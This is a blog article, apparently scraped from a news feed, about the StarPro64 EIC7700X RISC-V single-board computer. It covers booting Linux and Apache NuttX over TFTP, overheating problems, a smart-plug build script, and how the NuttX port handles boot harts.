    Don't hesitate to go look at the project page and test nginx explorer ./ngxp.sh servethis.

    ]]>
    https://blog.izissise.net/posts/ngxp-upload/ hacker-news-small-sites-43222545 Sat, 01 Mar 2025 19:09:52 GMT
    <![CDATA[StarPro64 EIC7700X RISC-V SBC: Maybe LLM on NPU on NuttX?]]> thread link) | @lupyuen
    March 1, 2025 | https://lupyuen.org/articles/starpro64.html | archive.org

    📝 2 Mar 2025

    StarPro64 EIC7700X RISC-V SBC: Maybe LLM on NPU on NuttX?

    StarPro64 EIC7700X is the (literally) Hot New RISC-V SBC by PINE64. In this article we chat about…

    • ESWIN EIC7700X, the RISC-V SoC inside StarPro64

    • Its Neural Processing Unit (NPU) that supports Large Language Models (LLM)

    • Booting RockOS Linux on StarPro64

    • Porting Apache NuttX RTOS to StarPro64

    • How LLM on NPU on NuttX might work

    • Multiple Harts are a little problematic

    • Beware of Overheating!

    • Smart Power Plug might be helpful

    We begin with the RISC-V SoC…

    (Watch the NuttX Demo on YouTube)

    (Thanks to PINE64 for providing the Prototype StarPro64)

    StarPro64 EIC7700X RISC-V SBC

    StarPro64: Isn’t it a souped-up Star64?

    Nope it’s a totally different beast! (From a different SoC Maker)

    Inside StarPro64 is the ESWIN EIC7700X SoC. EIC7700X has Four RISC-V Cores and it’s based on SiFive Architecture (a bit like JH7110 SoC)

    ESWIN EIC7700X SoC

    But its super-speedy Neural Processing Unit (NPU) makes it a very special (llama?) beast. Later we’ll talk about the Fun LLM Experiments that we can run on the NPU.

    (20 TOPS INT8 = 20 Trillion Ops Per Second for 8-bit Integers)

    ESWIN EIC7700X NPU

    EIC7700X Technical Reference Manual is probably the best among the RISC-V SoCs (BL808, SG2000, JH7110)

    We go hands-on…

    Connecting USB UART Dongle to StarPro64

    What happens if we boot StarPro64? Fresh from the box?

    We monitor the UART0 Port for Debug Messages. Connect our USB UART Dongle (CH340 or CP2102) to these pins (pic above)

    StarPro64USB UARTColour
    GND (Pin 6)GNDYellow
    TX (Pin 8)RXBlue
    RX (Pin 10)TXGreen

    (Same Pins as the GPIO Header on Oz64 SG2000 and Star64 JH7110)

    Connect to the USB UART at 115.2 kbps

    screen /dev/ttyUSB0 115200

    Power up the board with a Power Adapter. (Same one as Star64 JH7110)

    We’ll see OpenSBI

    OpenSBI v1.5
       ____                    _____ ____ _____
      / __ \                  / ____|  _ \_   _|
     | |  | |_ __   ___ _ __ | (___ | |_) || |
     | |  | | '_ \ / _ \ '_ \ \___ \|  _ < | |
     | |__| | |_) |  __/ | | |____) | |_) || |_
      \____/| .__/ \___|_| |_|_____/|____/_____|
            | |
            |_|
    Platform Name             : ESWIN EIC7700 EVB
    Platform Features         : medeleg
    Platform HART Count       : 4
    Platform Console Device   : uart8250
    Firmware Base             : 0x80000000
    
    Domain0 Boot HART         : 2
    Domain0 HARTs             : 0*,1*,2*,3*
    Domain0 Next Address      : 0x0000000080200000
    
    Boot HART ID              : 2
    Boot HART Base ISA        : rv64imafdchx
    Boot HART ISA Extensions  : sscofpmf,zihpm,sdtrig
    Boot HART MIDELEG         : 0x0000000000002666
    Boot HART MEDELEG         : 0x0000000000f0b509

    Then U-Boot Bootloader

    U-Boot 2024.01-gaa36f0b4 (Jan 23 2025 - 02:49:59 +0000)
    CPU:     rv64imafdc_zba_zbb
    Model:   ESWIN EIC7700 EVB
    DRAM:    32 GiB (effective 16 GiB)
    llCore:  143 devices, 31 uclasses, devicetree: separate
    Warning: Device tree includes old 'u-boot,dm-' tags: please fix by 2023.07!
    MMC:    sdhci@50450000: 0, sd@50460000: 1
    
    Loading Environment from SPIFlash...
    SF: Detected w25q128fw with page size 256 Bytes, erase size 4 KiB, total 16 MiB
    *** Warning - bad CRC, using default environment
    No SATA device found!
    Hit any key to stop autoboot:  0
    =>

    And it stops at U-Boot, waiting to boot from MicroSD or eMMC. Let’s init our eMMC…

    (See the Boot Log)

    HDMI Output will show U-Boot, but not OpenSBI

    Is there a Linux Image for StarPro64?

    The fine folks at PLCT Lab RockOS are busy preparing the Linux Image for StarPro64. Thanks to @icenowy, we have a Preview Version of the Linux Image…

    1. Bootloader (OpenSBI + U-Boot)

      bootloader_secboot_ddr5_pine64-starpro64.bin

    2. Linux Boot Image (Linux Kernel)

      boot-rockos-20250123-210346.ext4.zst

    3. Linux Root Image (Linux Filesystem)

      root-rockos-20250123-210346.ext4.zst

    Uncompress the files and rename them. Copy them to a USB Drive (not MicroSD)

    $ ls -lh *.bin *.zst
    4.2M  bootloader_secboot_ddr5_pine64-starpro64.bin
    154M  boot-rockos-20250123-210346.ext4.zst
    2.3G  root-rockos-20250123-210346.ext4.zst
    
    $ unzstd boot-rockos-20250123-210346.ext4.zst
    boot-rockos-20250123-210346.ext4.zst: 524288000 bytes
    
    $ unzstd root-rockos-20250123-210346.ext4.zst
    root-rockos-20250123-210346.ext4.zst: 7516192768 bytes
    
    $ mv boot-rockos-20250123-210346.ext4 boot.ext4
    $ mv root-rockos-20250123-210346.ext4 root.ext4
    
    $ ls -lh *.bin *.ext4
    4.2M  bootloader_secboot_ddr5_pine64-starpro64.bin
    500M  boot.ext4
    7.0G  root.ext4
    
    $ cp *.bin *.ext4 /media/$USER/YOUR_USB_DRIVE

    We’ll skip the MicroSD Image, because MicroSD Interface wasn’t working reliably on our Prototype StarPro64.

    StarPro64 with eMMC

    How to load the Linux Image into eMMC?

    Based on the ESWIN Official Doc

    1. Connect our eMMC to StarPro64 (pic above)

    2. Connect our USB Drive (Previous Section)

    3. At U-Boot: Press Ctrl-C until U-Boot stops

    4. Verify that the eMMC is OK

      $ ls mmc 0
      [ Nothing ]
      
      $ mmc part
      [ Nothing ]
    5. First Time Only: GPT Partition our eMMC…

      $ echo $partitions
      partitions=
        name=boot,start=1MiB,size=2048MiB,type=${typeid_filesystem},uuid=${uuid_boot};
        name=swap,size=4096MiB,type=${typeid_swap},uuid=${uuid_swap};
        name=root,size=-,type=${typeid_filesystem},uuid=${uuid_root}
      
      $ run gpt_partition
      $ mmc part
        1 0x00000800 0x001007ff "boot"
        2 0x00100800 0x009007ff "swap"
        3 0x00900800 0x0e677fde "root"
    6. Verify that our USB Drive works…

      $ ls usb 0
       524288000 boot.ext4
      7516192768 root.ext4
         4380760 bootloader_secboot_ddr5_pine64-starpro64.bin   
    7. Install the Bootloader, Boot Image and Root Image, from USB Drive to eMMC…

      $ es_fs update usb 0 boot.ext4 mmc 0:1
      mmc has been successfully writen in mmc 0:1
      
      $ es_fs update usb 0 root.ext4 mmc 0:3
      mmc has been successfully writen in mmc 0:3
      
      $ ext4load usb 0 0x100000000 bootloader_secboot_ddr5_pine64-starpro64.bin
      4380760 bytes read in 162 ms (25.8 MiB/s)
      
      $ es_burn write 0x100000000 flash
      bootloader write OK

      (See the eMMC Log)

    8. Beware of Overheating! Keep StarPro64 cool, or the previous step might corrupt the SPI Boot Flash and cause unspeakable agony…

    StarPro64 with USB Fan

    Something is smelling like barbecue?

    Whoa StarPro64 is on fire: Drop it, stop it and power off! StarPro64 will show PLL Errors when it overheats…

    pll failed.
    pll failed.
    pll failed.

    Also watch for Thermal Errors when booting Linux…

    thermal thermal_zone0: thermal0:
    critical temperature reached, shutting down
    reboot: HARDWARE PROTECTION shutdown (Temperature too high)

    Install a USB Fan, preferably something stronger. (Pic above, boxed up with IKEA 365+)

    But don’t power it with the USB Port on StarPro64! Instead, connect it to our Smart Power Plug.

    Anything else we should worry about?

    The MicroSD Interface wasn’t working well on our Prototype StarPro64. The MicroSD Card deactivated itself after a bit of U-Boot Access.

    Hence the Headless Ironman: USB Drive on StarPro64…

    Headless Ironman: USB Drive on StarPro64

    Earlier we flashed Linux to eMMC. Can we boot Linux now?

    Yep just power up StarPro64. eMMC will Boot Linux

    U-Boot menu
    1:      RockOS GNU/Linux 6.6.73-win2030
    2:      RockOS GNU/Linux 6.6.73-win2030 (rescue target)
    Enter choice: 1:        RockOS GNU/Linux 6.6.73-win2030
    Retrieving file: /vmlinuz-6.6.73-win2030
    Retrieving file: /initrd.img-6.6.73-win2030
    append: root=PARTUUID=b0f77ad6-36cd-4a99-a8c0-31d73649aa08 console=ttyS0,115200 root=PARTUUID=b0f77ad6-36cd-4a99-a8c0-31d73649aa08 rootfstype=ext4 rootwait rw earlycon selinux=0 LANG=en_US.UTF-8
    
    Retrieving file: /dtbs/linux-image-6.6.73-win2030/eswin/eic7700-pine64-starpro64.dtb
       Uncompressing Kernel Image
    Moving Image from 0x84000000 to 0x80200000, end=81e63000
    ## Flattened Device Tree blob at 88000000
       Booting using the fdt blob at 0x88000000
    Working FDT set to 88000000
    ERROR: reserving fdt memory region failed (addr=fffff000 size=1000 flags=4)
       Using Device Tree in place at 0000000088000000, end 0000000088027af4
    Working FDT set to 88000000
    
    Starting kernel ...
    Linux version 6.6.73-win2030 (riscv@riscv-builder) (riscv64-unknown-linux-gnu-gcc () 13.2.0, GNU ld (GNU Binutils) 2.42) #2025.01.23.02.46+aeb0f375c SMP Thu Jan 23 03:08:39 UTC 2025
    Machine model: Pine64 StarPro64
    ...
    mmc0: Timeout waiting for hardware interrupt.
    mmc0: sdhci: ============ SDHCI REGISTER DUMP ===========
    mmc0: sdhci: Sys addr:  0x00000008 | Version:  0x00000005
    mmc0: sdhci: Blk size:  0x00007200 | Blk cnt:  0x00000000

    Sadly the Preview Version of RockOS won’t boot correctly on our Prototype StarPro64 (pic below). Hopefully we’ll sort this out real soon and do some Serious NPU LLM!

    (See the Boot Log)

    RockOS won’t boot correctly on our Prototype StarPro64

    Bummer. What else can we boot on StarPro64?

    Let’s snoop around U-Boot Bootloader. And figure out how to boot Apache NuttX RTOS.

    Power up StarPro64 and press Ctrl-C until U-Boot stops. At the U-Boot Prompt: We enter these commands…

    $ help
    printenv  - print environment variables
    saveenv   - save environment variables to persistent storage
    net       - NET sub-system
    dhcp      - boot image via network using DHCP/TFTP protocol
    tftpboot  - load file via network using TFTP protocol
    fdt       - flattened device tree utility commands
    booti     - boot Linux kernel 'Image' format from memory
    
    $ printenv
    fdt_addr_r=0x88000000
    kernel_addr_r=0x84000000
    loadaddr=0x80200000

    (See the U-Boot Log)

    A-ha! This says…

    • U-Boot supports booting over TFTP: Trivial File Transfer Protocol

    • It will load the Kernel Image (Linux / NuttX) into RAM at 0x8400 0000

    • Then it will move the Kernel Image to 0x8020 0000 and boot there

    • Also it loads the Device Tree into 0x8800 0000

    Thanks U-Boot! You told us everything we need to Boot NuttX…

    Booting NuttX over TFTP

    How to boot NuttX over TFTP? (Pic above)

    1. Install our TFTP Server: Follow the instructions here

    2. Copy these files to our TFTP Server…

      NuttX Image: Image

      Device Tree: eic7700-evb.dtb

      Like so…

      ## Download the NuttX Image and Device Tree
      wget https://github.com/lupyuen2/wip-nuttx/releases/download/starpro64-1/Image
      wget https://github.com/lupyuen/nuttx-starpro64/raw/refs/heads/main/eic7700-evb.dtb
      
      ## Copy the NuttX Image and Device Tree to our TFTP Server
      scp Image tftpserver:/tftpboot/Image-starpro64
      scp eic7700-evb.dtb tftpserver:/tftpboot/
      ssh tftpserver ls -l /tftpboot/

      (How to Build NuttX ourselves)

      (NuttX won’t read the Device Tree)

    3. Power up StarPro64 and press Ctrl-C until U-Boot stops

    4. At the U-Boot Prompt: Enter these commands…

      ## Check if the Network Adapter is alive
      ## "eth0 : ethernet@50400000 f6:70:f9:6e:73:ae active"
      net list
      
      ## Set the U-Boot TFTP Server
      ## TODO: Change to your TFTP Server
      setenv tftp_server 192.168.31.10
      
      ## Save the U-Boot Config for future reboots
      saveenv
      
      ## Fetch the IP Address over DHCP
      ## Load the NuttX Image from TFTP Server
      ## kernel_addr_r=0x84000000
      dhcp ${kernel_addr_r} ${tftp_server}:Image-starpro64
      
      ## Load the Device Tree from TFTP Server
      ## fdt_addr_r=0x88000000
      ## TODO: Fix the Device Tree, it's not needed by NuttX
      tftpboot ${fdt_addr_r} ${tftp_server}:eic7700-evb.dtb
      
      ## Set the RAM Address of Device Tree
      ## fdt_addr_r=0x88000000
      ## TODO: Fix the Device Tree, it's not needed by NuttX
      fdt addr ${fdt_addr_r}
      
      ## Boot the NuttX Image with the Device Tree
      ## kernel_addr_r=0x84000000
      ## fdt_addr_r=0x88000000
      ## TODO: Fix the Device Tree, it's not needed by NuttX
      booti ${kernel_addr_r} - ${fdt_addr_r}

      (U-Boot dropping chars? Try iTerm > Edit > Paste Special > Paste Slowly)

    5. NuttX boots OK on StarPro64 and passes OSTest yay! (Pic below)

      NuttShell (NSH) NuttX-12.4.0
      nsh> uname -a
      NuttX 12.4.0 83424f8d26 Feb 24 2025 06:50:22 risc-v starpro64
      
      nsh> hello
      Hello, World!!
      
      nsh> getprime
      getprime took 148 msec    
      
      nsh> ostest
      ostest_main: Exiting with status 0

      (See the NuttX Log)

      (Watch the Demo on YouTube)

    6. How did we port NuttX to StarPro64? Check the details here…

      “Port NuttX to StarPro64”

    NuttX boots OK on StarPro64 yay!

    We type these commands EVERY TIME we boot?

    We can automate: Just do this once, and NuttX will Auto-Boot whenever we power up…

    ## Add the Boot Command for TFTP
    setenv bootcmd_tftp 'dhcp ${kernel_addr_r} ${tftp_server}:Image-starpro64 ; tftpboot ${fdt_addr_r} ${tftp_server}:eic7700-evb.dtb ; fdt addr ${fdt_addr_r} ; booti ${kernel_addr_r} - ${fdt_addr_r}'
    
    ## Save it for future reboots
    saveenv
    
    ## Test the Boot Command for TFTP, then reboot
    run bootcmd_tftp
    
    ## Remember the Original Boot Command: `bootflow scan -lb`
    setenv orig_bootcmd "$bootcmd"
    
    ## Prepend TFTP to the Boot Command: `run bootcmd_tftp ; bootflow scan -lb`
    setenv bootcmd "run bootcmd_tftp ; $bootcmd"
    
    ## Save it for future reboots
    saveenv

    Next comes the fun part that turns StarPro64 into a totally different beast from Star64…

    (U-Boot dropping chars? Try iTerm > Edit > Paste Special > Paste Slowly)

    (How to Undo Auto-Boot? Allow Static IP?)

    StarPro64 with Touchscreen

    Oh really? Large Language Model on Single-Board Computer? (Eyes roll)

    Hear me out…

    1. 20 TOPS INT8: That’s the spec of the speedy Neural Processing Unit (NPU) inside StarPro64. (20 Trillion Ops Per Second for 8-bit Integers)

      Yeah an Offline Disconnected LLM will run (somewhat) OK on any CPU. But this NPU is designed for such LLMs. (Goodbye “TensorFlow Lite”)

    2. Qwen LLM runs locally on EIC7700X NPU today. Probably Next: Llama LLM and DeepSeek LLM?

      (Qwen 2 with 0.5 Billion Parameters, pic below)

      Qwen LLM on EIC7700X NPU

    3. Offline Disconnected LLM on SBC might be useful for Smart Home Security

      “Hi LLM: Please connect my Home Security System to this Doorbell Camera and my IKEA Zigbee Lights and Xiaomi Motion Sensor and Samsung TV”

    4. Creature Sensor Maybe? A Remote Sensor that uses Cameras to identify Rainforest Critters and Underwater Creatures. But everything it sees becomes ultra-compressed into 16 bytes of text

      “DUCK!” “OCTOPUS!” (Pic below)

    5. EIC7700X NPU Driver is Dual-Licensed: BSD and GPL. Which means we can run it on all kinds of software platforms and create interesting apps.

    6. Will it be Expensive? We hear that StarPro64 will be priced super affordably. Works with a Touchscreen too. (Pic above)

      This is the right time to experiment with an Offline Disconnected LLM!

    LLM Creature Sensor: A Remote Sensor that uses Cameras to identify Rainforest Critters and Underwater Creatures. But everything it sees becomes ultra-compressed into 16 bytes of text

    (Here’s an idea for Sci-Fi Horror: We install an LLM Sensor in a Remote Uninhabited Island. One day we receive sinister words from our LLM Sensor: “EVIL!”, “DEATH!”, “DOOM!”…)

    Isn’t Linux a little wonky on StarPro64?

    Ah here’s our opportunity to create a “Power Efficient” (?) LLM with NuttX…

    Odd name innit: Qwen?

    Qwen will sound confusing to Bilingual Folks…

    • It’s NOT supposed to rhyme with Gwen Stefani / Gwen Stacy

    • Instead it’s pronounced “Q Wen”

    • And it confuses me: “Q = Question” and “Wen = 问 = Question”, thus contracting to “QQ”, which means “Bouncy”

    • Thankfully “Q Wen” actually means something: “千问” (Ask a Thousand Questions, “Qian1 Wen4”)

    • Which is short for “通义千问” (Tong1 Yi4 Qian1 Wen4), meaning “通情,达义”

    StarPro64 with Smart Power Plug

    Flipping StarPro64 on and off. Again and again. Must be an easier way?

    Try a Smart Power Plug (pic above), integrated with our Build Script.

    In our Demo Video: Skip to 00:35 and watch our Build Script auto-power up StarPro64…

    1. Our Script will build the NuttX Image and copy to TFTP Server

    2. Power StarPro64 Off then On

    3. Wait Manually for Testing to Complete (“Press Enter”)

    4. And Power Off StarPro64

    How does it work? Here’s our Build Script: run.sh

    ## Omitted: Build the NuttX Image and copy to TFTP Server
    ## make -j ...
    
    ## Get the Home Assistant Token, copied from http://localhost:8123/profile/security
    ## export token=xxxx
    . $HOME/home-assistant-token.sh
    
    ## Power Off the SBC
    curl \
      -X POST \
      -H "Authorization: Bearer $token" \
      -H "Content-Type: application/json" \
      -d '{"entity_id": "automation.starpro64_off"}' \
      http://localhost:8123/api/services/automation/trigger
    
    ## Power On the SBC
    curl \
      -X POST \
      -H "Authorization: Bearer $token" \
      -H "Content-Type: application/json" \
      -d '{"entity_id": "automation.starpro64_on"}' \
      http://localhost:8123/api/services/automation/trigger
    
    ## Wait Manually for SBC Testing to complete
    ## Don't wait too long, it will overheat!
    echo Press Enter to Power Off
    read
    
    ## Power Off the SBC, because it will overheat!
    ## Excessive Heatiness needs Oldenlandia Cooling Water?  
    curl \
      -X POST \
      -H "Authorization: Bearer $token" \
      -H "Content-Type: application/json" \
      -d '{"entity_id": "automation.starpro64_off"}' \
      http://localhost:8123/api/services/automation/trigger

    (See the Build Script)

    (See the Build Log)

    Smart Power Plug in IKEA App and Google Home

    This script assumes that we have…

    Smart Power Plug in Home Assistant

    Smart Power Plug might disconnect USB UART sometimes?

    To work around this: We run a loop for the UART Terminal

    ## First Time Only
    echo "defscrollback 1000000" >> ~/.screenrc
    
    ## On Power Off: USB Serial might disconnect
    ## So we reconnect forever
    set -x
    for (( ; ; )) do 
      screen /dev/ttyUSB* 115200
      sleep 5
    done

    How to save the Entire Console Log from screen?

    Inside screen: Press this Magic Konami Sequence…

    Ctrl-a [          ## Enter Copy Mode (scrollback)
    g <Space>         ## Jump to the top, start marking
    G <Enter>         ## Jump to the bottom, end marking
    Ctrl-a :writebuf  ## Write the marked buffer to /tmp/screen-exchange

    Everything gets saved into /tmp/screen-exchange

    (We could actually allow a Remote Developer to boot and test NuttX on StarPro64… From anywhere in the world!)

    Remember our USB Fan? It goes into our Smart Power Plug as a Power Jenga like so…

    USB Fan goes into our Smart Power Plug as a Power Jenga

    We’re seeking volunteers to build NuttX Drivers for StarPro64 (GPIO, SPI, I2C, MIPI CSI / DSI, Ethernet, WiFi, NPU, …) Please lemme know!

    Right now we’re upstreaming StarPro64 to NuttX Mainline

    Maybe we’ll create a TinyEMU Emulator for StarPro64? 🤔

    Special Thanks to My Sponsors for supporting my writing. Your support means so much to me 🙏

    Got a question, comment or suggestion? Create an Issue or submit a Pull Request here…

    lupyuen.org/src/starpro64.md

    NuttX boots only on Hart 0

    Multiple Harts are problematic. Why?

    Inside EIC7700X SoC: We have Four Harts (RISC-V CPU Cores) numbered 0 to 3.

    This SoC will boot OpenSBI on Any Random Hart, 0 to 3! Which means U-Boot and NuttX will subsequently boot on the Same Random Hart.

    What’s the problem?

    NuttX assumes that it always Boots on Hart 0. (Pic above)

    When NuttX boots on Harts 1 to 3: Our RISC-V Boot Code calls riscv_set_inital_sp. Which will fail: riscv_macros.S

    ## Set inital sp for riscv core. This function should be only called when initing.
    ## TODO: Support Non-Zero Boot Hart.
    .macro riscv_set_inital_sp base, size, hartid
      la      t0, \base
      li      t1, \size
      mul     t1, \hartid, t1
      add     t0, t0, t1
    
      ## Ensure the last XCPTCONTEXT_SIZE is reserved for non boot CPU
      bnez \hartid, 998f
      li   t1, STACK_ALIGN_DOWN(\size)
      j    999f
    998:
      li   t1, STACK_ALIGN_DOWN(\size - XCPTCONTEXT_SIZE)
    999:
      add  t0, t0, t1
      mv   sp, t0
    .endm

    How to fix this?

    Our workaround is to Always Reboot NuttX on Hart 0

    1. If Boot Hart is Not 0:

      Restart NuttX with Hart 0

    2. If Boot Hart is 0:

      Continue Starting NuttX

    Harts vs CPUs: What’s the difference?

    NuttX insists on booting with CPU 0. Otherwise it fails with this nx_start Error

    [CPU2] dump_assert_info:
    Assertion failed up_cpu_index() == 0: 
    at file: init/nx_start.c:745 task(CPU2):
    CPU2 IDLE process: Kernel 0x802019a6

    That’s why we Renumber the CPUs: Boot Hart is always CPU 0. Other Harts become CPUs 1 to 3. For Example: If boot_hart=2 then…

    • hart=2, cpu=0
    • hart=0, cpu=1
    • hart=1, cpu=2
    • hart=3, cpu=3

    Can’t we use One Hart and ignore the Other Harts?

    OK Mister Cold-Harted: We tried Enabling One Hart Only (CPU 0). But OSTest hangs at sem_test

    ## OSTest hangs for StarPro64 when we enable One Hart only...
    user_main: semaphore test
    sem_test: Initializing semaphore to 0
    sem_test: Starting waiter thread 1
    sem_test: Set thread 1 priority to 191
    ## Oops: Thread 1 is NOT started!
    
    sem_test: Starting waiter thread 2
    sem_test: Set thread 2 priority to 128
    waiter_func: Thread 2 Started
    
    ## Oops: Semaphore Value should be -1!
    waiter_func: Thread 2 initial semaphore value = 0
    waiter_func: Thread 2 waiting on semaphore
    ## Hangs here

    Compare the above with SG2000 sem_test

    ## OSTest runs OK for SG2000...
    user_main: semaphore test
    sem_test: Initializing semaphore to 0
    sem_test: Starting waiter thread 1
    sem_test: Set thread 1 priority to 191
    ## Yep Thread 1 is started
    waiter_func: Thread 1 Started
    
    sem_test: Starting waiter thread 2
    waiter_func: Thread 1 initial semaphore value = 0
    sem_test: Set thread 2 priority to 128
    waiter_func: Thread 1 waiting on semaphore
    waiter_func: Thread 2 Started
    
    ## Yep Semaphore Value is -1
    waiter_func: Thread 2 initial semaphore value = -1
    waiter_func: Thread 2 waiting on semaphore
    sem_test: Starting poster thread 3
    ## Completes successfully

    Here’s the problem: sem_test calls nx_pthread_create to create Thread #1

    int nx_pthread_create(...) { ...
    #ifdef CONFIG_SMP
      // pthread_setup_scheduler() will set the affinity mask by inheriting the
      // setting from the parent task.  We need to override this setting
      // with the value from the pthread attributes unless that value is
      // zero:  Zero is the default value and simply means to inherit the
      // parent thread's affinity mask.
      if (attr->affinity != 0) {
        ptcb->cmn.affinity = attr->affinity;
      }
    #endif

    But…

    • Our New Thread defaults to No CPU Affinity

    • Thus it Lacks Affinity for CPU 0

    • So it gets allocated to Another CPU

    • Which never runs!

    Hence sem_test loops forever waiting for the Semaphore Value to change.

    (Watch the Demo on YouTube)

    (See the NuttX Log)
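
    By the way: if we only wanted this particular test to pass with One Hart enabled, pinning the waiter threads to CPU 0 would sidestep the affinity problem. Here’s a minimal sketch, assuming NuttX’s glibc-style pthread_attr_setaffinity_np is available; this is an illustration, not the workaround we actually applied…

    #include <pthread.h>
    #include <sched.h>

    // Hypothetical helper: create a thread pinned to CPU 0, so it can run
    // even when only One Hart is enabled. (Sketch only; our actual fix is
    // to Reboot NuttX on Hart 0 and renumber the CPUs.)
    static int start_pinned_to_cpu0(pthread_t *tid, void *(*fn)(void *), void *arg) {
      pthread_attr_t attr;
      cpu_set_t cpuset;
      pthread_attr_init(&attr);
      CPU_ZERO(&cpuset);
      CPU_SET(0, &cpuset);  // Affinity Mask: CPU 0 only, never another CPU
      pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset);
      return pthread_create(tid, &attr, fn, arg);
    }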

    In Future: How to enable Multiple Harts?

    To Enable Multiple Harts in future, we undo these changes…

    Remember to update the StarPro64 defconfig

    ## Enable SMP with 4 CPUs
    CONFIG_SMP=y
    CONFIG_SMP_NCPUS=4

    And remember to fix riscv_set_inital_sp. Meanwhile let’s run everything on Hart 0…

    NuttX Build for StarPro64

    Earlier we booted Image-starpro64 over TFTP. How to get the file?

    Download the file Image from below and rename it Image-starpro64

    If we prefer to build NuttX ourselves…

    1. Install the Build Prerequisites, skip the RISC-V Toolchain…

      “Install Prerequisites”

    2. Download the RISC-V Toolchain for riscv-none-elf (xPack)…

      “xPack GNU RISC-V Embedded GCC Toolchain for 64-bit RISC-V”

    3. Download and Build NuttX for StarPro64 (work-in-progress)…

      git clone https://github.com/lupyuen2/wip-nuttx nuttx --branch starpro64
      git clone https://github.com/lupyuen2/wip-nuttx-apps apps --branch starpro64
      cd nuttx
      tools/configure.sh milkv_duos:nsh
      
      ## Build the NuttX Kernel and Apps
      make -j
      make -j export
      pushd ../apps
      ./tools/mkimport.sh -z -x ../nuttx/nuttx-export-*.tar.gz
      make -j import
      popd
      
      ## Generate Initial RAM Disk
      ## Prepare a Padding with 64 KB of zeroes
      ## Append Padding and Initial RAM Disk to NuttX Kernel
      genromfs -f initrd -d ../apps/bin -V "NuttXBootVol"
      head -c 65536 /dev/zero >/tmp/nuttx.pad
      cat nuttx.bin /tmp/nuttx.pad initrd \
        >Image
      
      ## Copy the NuttX Image and Device Tree to TFTP Server
      wget https://github.com/lupyuen/nuttx-starpro64/raw/refs/heads/main/eic7700-evb.dtb
      scp Image tftpserver:/tftpboot/Image-starpro64
      scp eic7700-evb.dtb tftpserver:/tftpboot/
      ssh tftpserver ls -l /tftpboot
      
      ## In U-Boot: Boot NuttX over TFTP
      ## setenv tftp_server 192.168.31.10 ; dhcp ${kernel_addr_r} ${tftp_server}:Image-starpro64 ; tftpboot ${fdt_addr_r} ${tftp_server}:eic7700-evb.dtb ; fdt addr ${fdt_addr_r} ; booti ${kernel_addr_r} - ${fdt_addr_r}

      (See the Build Script)

      (See the Build Log)

      (See the Build Outputs)

    4. The steps above assume that we’ve installed our TFTP Server, according to the instructions here

    5. Then follow these steps to boot NuttX on StarPro64…

      “Boot NuttX over TFTP”

    6. Powering StarPro64 on and off can get tiresome. Try a Smart Power Plug, integrated with our Build Script…

      “Smart Power Plug”

    7. How did we port NuttX to StarPro64? Check the details here…

      “Port NuttX to StarPro64”

    Virtual Memory for NuttX Apps

    Why the RAM Disk? Isn’t NuttX an RTOS?

    StarPro64 uses a RAM Disk because it runs in NuttX Kernel Mode (instead of the typical Flat Mode). This means we can do Memory Protection and Virtual Memory for Apps. (Pic above)

    But it also means we need to bundle the NuttX Apps as ELF Files, hence the RAM Disk…

    Most of the NuttX Platforms run on NuttX Flat Mode, which has NuttX Apps Statically-Linked into the NuttX Kernel.

    NuttX Flat Mode works well for Small Microcontrollers. But StarPro64 and other SoCs will need the more sophisticated NuttX Kernel Mode

    NuttX boots OK on StarPro64 yay!

    How did we port NuttX to StarPro64? In under One Week?

    We took the NuttX Port of Milk-V Duo S (Oz64 SG2000) and tweaked it for StarPro64 EIC7700X. Here are the minor modifications…

    §14.1 RISC-V Boot Code

    arch/risc-v/src/eic7700x/eic7700x_head.S

    This is the RISC-V Boot Code that runs first when U-Boot Bootloader starts NuttX.

    In the Linux Kernel Header: We modified the Kernel Size based on U-Boot (fdt_addr_r - kernel_addr_r)

    This ensures that the Entire NuttX Image (including Initial RAM Disk) will be copied correctly from kernel_addr_r (0x8400_0000) to loadaddr (0x8020_0000)

    /* Linux Kernel Header */
    __start:
      ...
      .quad  0x4000000  /* Kernel size (fdt_addr_r-kernel_addr_r) */

    The Original Code assumes that we always Boot at Hart 0. But EIC7700X will Boot From Any Hart. (0 to 3)

    This modification allows NuttX to Boot from any Hart…

      /* TODO SMP: Enable this for SMP
      /* If a0 (hartid) >= t1 (the number of CPUs), stop here
      blt  a0, t1, 3f
      csrw CSR_SIE, zero
      wfi
      */
    
    3:
      /* Set stack pointer to the idle thread stack. Assume Hart 0. */
      li a2, 0
      riscv_set_inital_sp EIC7700X_IDLESTACK_BASE, SMP_STACK_SIZE, a2
    
      /* TODO SMP: Enable this for SMP
      riscv_set_inital_sp EIC7700X_IDLESTACK_BASE, SMP_STACK_SIZE, a0
      */

    (Previously here)

    Right now we support One Single Hart for EIC7700X. “TODO SMP” flags the code that will be modified (in future) to support Multiple Harts for EIC7700X.

    (Multiple Harts explained)

    §14.2 NuttX Start Code

    arch/risc-v/src/eic7700x/eic7700x_start.c

    NuttX boots here, called by the RISC-V Boot Code (from above). We made these changes to allow Booting from Any Hart

    1. If Boot Hart is Not 0:

      Restart NuttX with Hart 0

    2. If Boot Hart is 0:

      Continue Starting NuttX

    // We remember the Boot Hart ID (0 to 3)
    int g_eic7700x_boot_hart = -1;
    
    // NuttX boots here, called by the RISC-V Assembly Boot Code
    void eic7700x_start(int mhartid) {
    
      // If Boot Hart is not 0: Restart NuttX with Hart 0
      if (mhartid != 0) {
    
        //  Clear the BSS and Restart with Hart 0
        //  __start points to our RISC-V Assembly Start Code
        eic7700x_clear_bss();
        boot_secondary(0, (uintptr_t)&__start);
    
        // Let this Hart idle forever (while Hart 0 runs)
        while (true) { asm("WFI"); }  
        PANIC();  // Should never come here
      }
    
      // Else Boot Hart is 0: We have successfully booted NuttX on Hart 0!
      if (g_eic7700x_boot_hart < 0) {
    
        // Init the globals once only. Remember the Boot Hart.
        // Clear the BSS
        g_eic7700x_boot_hart = mhartid;
        eic7700x_clear_bss();
    
        // TODO SMP: Start the Other Harts by calling OpenSBI
        // eic7700x_boot_secondary();
    
        // Copy the RAM Disk
        // Initialize the per CPU areas
        eic7700x_copy_ramdisk();
        riscv_percpu_add_hart(mhartid);
      }
      // Omitted: Call eic7700x_start_s

    (Previously here)

    The code below will be used (in future) to support Multiple Harts

    // Boot NuttX on the Hart
    void eic7700x_start_s(int mhartid) {
    
      // Configure the FPU
      // If this is not the Boot Hart: Jump to cpux
      riscv_fpuconfig();
      if (mhartid != g_eic7700x_boot_hart) { goto cpux; }
    
      // Omitted: Boot Hart starts here and calls nx_start()
      ...
    
    cpux:
      // TODO SMP: Non-Boot Hart starts here
      // We init the NuttX CPU
      riscv_cpu_boot(mhartid);

